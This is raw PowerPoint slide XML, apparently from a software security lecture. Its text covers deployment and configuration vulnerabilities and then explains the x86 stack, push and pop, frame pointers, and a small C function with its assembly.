              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easier if not completely automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much research has been devoted to finding vulnerabilities, designing prevention techniques, and developing detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some of these mechanisms have found their way to mainstream operating system (non-executable stack, layout randomization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199190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3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3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31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31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31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3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Vulnerabilities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These vulnerabilities are introduced by an incorrect/faulty deployment/configuration of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed with more privileges than the ones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>should have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed on a system that has a faulty security policy and/or mechanism (e.g., a file that should be read-only is actually writeable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An application is configured with easy-to-guess default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If correctly deployed, the application would be (more) secure </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86701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Stack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Stack is essentially scratch memory for functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used in MIPS, ARM, x86, and x86-64 processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Starts at high memory addresses and grows down</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functions are free to push registers or values onto the stack, or pop values from the stack into registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The assembly language supports this on x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> holds the address of the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> decrements the stack pointer (</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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) then stores the value in </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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to the location pointed to by the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stores the value at the location pointed to by the stack pointer into </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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, then increments the stack pointer (</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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105543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Example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Garbage</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="27668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0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953845" y="1778558"/>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850512" y="3194048"/>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850512" y="3597008"/>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6245411" y="187125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33045" y="5147061"/>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469999" y="5140434"/>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33045" y="5515108"/>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469999" y="5521871"/>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47397" y="5883155"/>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469999" y="5883155"/>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0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Example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Garbage</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="27668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0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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15065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3959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Example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Garbage</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168494" y="27668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0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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15065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850512" y="2858824"/>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12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Example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Garbage</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74</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0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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341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2567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Example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Garbage</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75</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0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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341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8033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Example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Garbage</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76</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0xFFFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>push %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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341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1168494" y="277284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6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Functions would like to use the stack to allocate space for their local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can we use the stack pointer for this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Yes, however stack pointer can change throughout program execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frame pointer points to the start of the function's frame on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each local variable will be (different) offsets of the frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In x86, frame pointer is called the base pointer, and is stored in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134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836" y="1579420"/>
            <a:ext cx="2507673" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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main</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">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a</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b</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float</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= 10;   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= 100;   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= 10.45;   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= a + b;   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRP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return</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0</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5112328" y="1600201"/>
            <a:ext cx="5832763" cy="47561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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a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 – 0xc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>– 0x4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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esp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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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-0x8(</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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0xc(</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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038120" y="1579420"/>
            <a:ext cx="3074208" cy="42268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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a @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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+ C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="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err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>+A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
